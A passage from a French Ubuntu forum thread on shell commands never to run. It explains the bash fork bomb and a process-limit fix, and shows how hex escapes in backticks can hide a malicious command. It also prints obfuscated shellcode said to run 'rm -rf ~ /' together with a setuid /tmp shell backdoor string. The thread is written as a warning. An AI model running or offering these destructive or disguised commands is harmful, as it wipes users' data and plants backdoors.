Contenu | Rechercher | Menus

Annonce

Si vous avez des soucis pour rester connecté, déconnectez-vous puis reconnectez-vous depuis ce lien en cochant la case
Me connecter automatiquement lors de mes prochaines visites.

À propos de l'équipe du forum.

#26 Le 23/10/2007, à 23:38

jajaX

Re : )) Commandes À Ne Pas Faire !! ((

sympa ce post lol


@+
jajaX
Asus X93SM-YZ157V / Asus X93SM-YZ065V sous KDE Neon
ASUS K95VB sous Kubuntu 22.04 Jammy Jellyfish (64 bits) / ACER Aspire 5612 WLMI sous Kubuntu 18.04 Bionic Beaver (32 bits)

Hors ligne

#27 Le 24/10/2007, à 01:03

Link31

Re : )) Commandes À Ne Pas Faire !! ((

Hoper a écrit :

je sais qu'au final elle crée une infinité de process, mais pourquoi...

C'est assez simple une fois qu'on a remplacé le : par un nom compréhensible.

:(){ :|:& };: devient fonct(){ fonct|fonct& };fonct

c'est-à-dire :

fonct()
{
      fonct|fonct&
};

fonct

On définit une fonction fonct, qui s'appelle elle-même (fonct|fonct&), puis redirige le résultat (en fait il n'y a pas de résultat, le but recherché est juste la redirection) vers une autre instance d'elle-même (fonct|fonct&) par l'intermédiaire d'un tuyau (fonct|fonct&). Cette dernière se place en arrière-plan (fonct|fonct&), ainsi elle ne bloque pas la suite de l'opération et ne disparaît pas si la fonction-mère se termine.
Enfin, la dernière ligne lance le tout.

Dernière modification par Link31 (Le 24/10/2007, à 01:03)

Hors ligne

#28 Le 24/10/2007, à 01:36

Astier

Re : )) Commandes À Ne Pas Faire !! ((

Intéressant ce post... A quand d'autres plaisanteries lol

Hors ligne

#29 Le 24/10/2007, à 07:09

Hoper

Re : )) Commandes À Ne Pas Faire !! ((

Link31 : Merci !! Clarissime comme explications smile


Mes tutos et coups de gueule :
http://hoper.dnsalias.net/atdc/
Mastodon: @hoper@framapiaf.org

Hors ligne

#30 Le 10/01/2008, à 13:21

bmens

Re : )) Commandes À Ne Pas Faire !! ((

magnifique tout ceci

on vas pouvoir s'amuser  LOL


Bon et maintenant un post avec les commandes courantes et indispensables

ce serais pas mal non plus

ça me rendrais service ( et à  beaucoup je pense )

personne pour le creer ?

Hors ligne

#31 Le 29/01/2008, à 02:39

The Marauder

Re : )) Commandes À Ne Pas Faire !! ((

Je me souviens d'un sujet du forum qui avait été délibérément destructeur par l'auteur mal intentionné. En gros il avait caché un rm -Rf /* dans une assez longue ligne de commande. à‰tant pas habitué plus que ça au shell (un peu mais pas a ce point), je me demandais si un "expert" pouvais tenter de l'indiquer ici ?


Un prog sans ses Source c'est comme une plage sans le sable.
Desktop Kubuntu 10.04 - netbook Kubuntu 10.04 - Serveur Debian Lenny
Commandes a  ne pas faire

Hors ligne

#32 Le 21/08/2008, à 17:45

\\Ouranos//

Re : )) Commandes À Ne Pas Faire !! ((

The Marauder a écrit :

Je me souviens d'un sujet du forum qui avait été délibérément destructeur par l'auteur mal intentionné. En gros il avait caché un rm -Rf /* dans une assez longue ligne de commande. à‰tant pas habitué plus que ça au shell (un peu mais pas a ce point), je me demandais si un "expert" pouvais tenter de l'indiquer ici ?

o-O

Sinon, pour les commandes qui font souffrir le proco : sad){ neutral:& cd /; du };:


Ubuntu facile, c'est :
- Dire "Bonjour"
- Lire la doc et les règles du forum avant de poster. Savoir poser une question intelligemment.
- Mettre des balises url autour des liens et un tiret à su.

Hors ligne

#33 Le 21/08/2008, à 18:08

Link31

Re : )) Commandes À Ne Pas Faire !! ((

Ouranos999 a écrit :

Sinon, pour les commandes qui font souffrir le proco : sad){ neutral:& cd /; du };:

Pour utiliser le processeur à 100% indépendemment du nombre de cœurs :

(for ((i=0;i<$[$(grep -c proc /proc/cpuinfo)-1];i++)); do yes & done & yes) > /dev/null; killall yes

(note : cette commande ne fait rien de dangereux en soi)

The Marauder> cherche parmi les messages de "safe93" (qui a changé de pseudo depuis l'incident)

Dernière modification par Link31 (Le 13/10/2008, à 20:03)

Hors ligne

#34 Le 13/10/2008, à 19:49

\\Ouranos//

Re : )) Commandes À Ne Pas Faire !! ((

Ca fonctionne sous Gentoo, je ne sais pas pour les autres OS :

su -c 'export CHOST="un-truc-debile-qui-va-tout-bousiller"'

Ubuntu facile, c'est :
- Dire "Bonjour"
- Lire la doc et les règles du forum avant de poster. Savoir poser une question intelligemment.
- Mettre des balises url autour des liens et un tiret à su.

Hors ligne

#35 Le 17/07/2009, à 23:31

Compte supprimé

Re : )) Commandes À Ne Pas Faire !! ((

Link31 a écrit :
alnitrik a écrit :
:(){ :|:& };:

Explication?et solution?

C'est la fameuse fork bomb, bien expliquée sur Wikipedia : http://fr.wikipedia.org/wiki/Fork_bomb

La solution : ajouter @users hard nproc 2000 dans le fichier /etc/security/limits.conf. Et rebooter avant de tester (ne faites pas comme moi qui ai testé immédiatement après tongue).

ajouter @users soft nproc 200 dans le fichier /etc/security/limits.conf. Et rebooter suffiront largement. Attention c'est soft et non hard !
Remplacer @users par l'utilisateur ou le groupe

Bug #400992 reported : Lack(s) in /etc/security/limits.conf
https://bugs.launchpad.net/ubuntu/+bug/400992

Dernière modification par Compte supprimé (Le 18/07/2009, à 09:01)

#36 Le 18/07/2009, à 09:53

Vysserk3

Re : )) Commandes À Ne Pas Faire !! ((

The Marauder a écrit :

Je me souviens d'un sujet du forum qui avait été délibérément destructeur par l'auteur mal intentionné. En gros il avait caché un rm -Rf /* dans une assez longue ligne de commande. à‰tant pas habitué plus que ça au shell (un peu mais pas a ce point), je me demandais si un "expert" pouvais tenter de l'indiquer ici ?

Je ne suis pas un expert, mais effectivement en écrivant en shellcode, c'est-à-dire directement en code machine dans le terminal, on peut masquer toute sorte de commande malicieuse.
Par exemple :

`echo "\x6c\x73"`

exécute ls. En effet, \x indique que ce qui suit est en hexadécimal. 6c et 73 correspondent respectivement aux lettres "l" et "s". Les quotes inversé ` (altgr+7) permet de faire interpréter le résultat de la commande echo, qui est ls, donc d'exécuter ls.

Imaginez alors ce qu'il est possible de faire  avec des rm. Il faut donc se méfier de ce genre de commande wink

Sur http://doc.ubuntu-fr.org/commandes_dangereuses#compilation_de_code, on voit qu'en utilisant du shell code on peut écrire un programme qui fait exactement ce que fait rm rf ...Donc méfiance.

Dernière modification par Vysserk3 (Le 18/07/2009, à 10:29)

Hors ligne

#37 Le 18/07/2009, à 17:21

Compte supprimé

Re : )) Commandes À Ne Pas Faire !! ((

Non, ce n'est pas du code machine. C'est du code ascii codé en hexadécimal.
On pourrait aussi avoir de l'ascii codé en octal.

echo -e "\043 \0116 \0157 \0156 \040 \0143 \047 \0145 \0163 \0164 \040 \0144 \0165 \040 \0143 \0157 \0144 \0145 \040 \0141 \0163 \0143 \0151 \0151"

Au final c'est du script Bash ici dans les deux cas.

#38 Le 18/07/2009, à 17:56

Vysserk3

Re : )) Commandes À Ne Pas Faire !! ((

Oui effectivement, je voulais parler de mon lien où là il y a du code machine écrit pour faire ce que fait le rm -rf.

Hors ligne

#39 Le 19/07/2009, à 07:11

Compte supprimé

Re : )) Commandes À Ne Pas Faire !! ((

Bonjour ... à tous !

Ce qui signifie que la commande rm :

ludovic@ubuntu:~$ ls -l /bin/rm
-rwxr-xr-x 1 root root 59952 2008-06-27 02:31 /bin/rm

de taille 58,55 ko se résumerait à ça : ?

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Voici le contenu en hexadécimal de la commande rm :

od -tx1 /bin/rm
rm.hex.txt
Les octets sont en hexadécimal et les adresses en octal.

Tiens : une autre commande à ne pas faire : od : permet de voir l'intérieur des fichiers ...

#40 Le 19/07/2009, à 07:58

Vysserk3

Re : )) Commandes À Ne Pas Faire !! ((

D'après le forum d'ubuntu, ca fait la commande :
rm -rf ~ / &
Qui supprime donc le répertoire personnel et tous les fichiers (si avec sudo).
Donc ca ne remplace pas la commande rm, qui elle doit aussi prendre en compte les paramètres et tout ça (d'où le code plus long ?). C'est juste du code destructeur qui fait ce que ferait cette commande destructrice...

Hors ligne